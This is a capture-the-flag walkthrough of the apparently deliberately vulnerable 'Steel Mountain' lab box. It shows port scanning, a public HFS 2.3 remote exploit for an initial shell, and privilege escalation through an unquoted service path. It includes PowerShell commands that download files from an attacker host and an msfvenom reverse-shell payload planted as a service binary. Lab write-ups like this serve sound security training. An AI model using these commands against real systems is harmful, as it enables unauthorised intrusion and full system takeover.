Reconnaissance
As always, the first step consists of the reconnaissance phase as port scanning.
Ports Scanning
During this step, we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA nmap 10.10.78.128
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: STEELMOUNTAIN
| NetBIOS_Domain_Name: STEELMOUNTAIN
| NetBIOS_Computer_Name: STEELMOUNTAIN
| DNS_Domain_Name: steelmountain
| DNS_Computer_Name: steelmountain
| Product_Version: 6.3.9600
|_ System_Time: 2020-04-23T03:09:55+00:00
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2020-04-22T02:48:20
|_Not valid after: 2020-10-22T02:48:20
|_ssl-date: 2020-04-23T03:10:02+00:00; 0s from scanner time.
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Enumerating Port 80
If we browser URL:80 we get an index.html file.
Gobuster
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.78.128/ -s '200,301,403' 2>/dev/null
We couldn’t find anything.
Enumerating Port 8080
After browsing IP:8080 we already found the version of HTTP File Server, from ‘Server Information’ section.
Searchsploit
As we searched for exploits related to HFS 2.3 version we could find many exploits.
searchsploit -m exploits/windows/remote/39161.py .
We copied exploit to our working directory to modify it for our needs.
After placing our IP address inside 39161.py exploit we’re ready to go!
And we got the low privileged shell!
User.txt flag can be found inside C:\Users\bill\Desktop\users.txt
Privilege Escalation
PowerUp.ps1
To get started with privilege escalation we’re gonna run PowerUp.ps1 script.
We’ve loaded PowerShell module through Metasploit to upload PowerUp.ps1 script.
load powershell
powershell_shell
To run PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
There are several unquoted path services available but that does not mean we have permission to edit or write in them. That is where accesschk.exe comes in handy.
accesschk.exe
accesschk.exe reveals ‘bill’ has write access to " C:\Program Files (x86)\IObit* ". If we modify the next PATH that the service checks for the executable related to AdvancedSystemCareService9, we can trick the service to run something else, such as a reverse shell.
powershell.exe -exec bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://10.11.2.77:8081/accesschk.exe', 'C:\Users\bill\Desktop\accesschk.exe')
accesschk.exe /accepteula -ucqv AdvancedSystemCareService9
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\"
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\IObit\"
Create a reverse shell named ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.2.77 LPORT=1337 -e x86/shikata_ga_nai -f exe -o ASCService.exe
Upload ASCService.exe reverse shell
powershell.exe -exec bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://10.11.2.77:8081/ASCService.exe', 'C:\Users\bill\Desktop\ASCService.exe')
Before, executing our payload we’re gonna have to stop the service and start again in order to get reverse shell.
sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
And we got root!
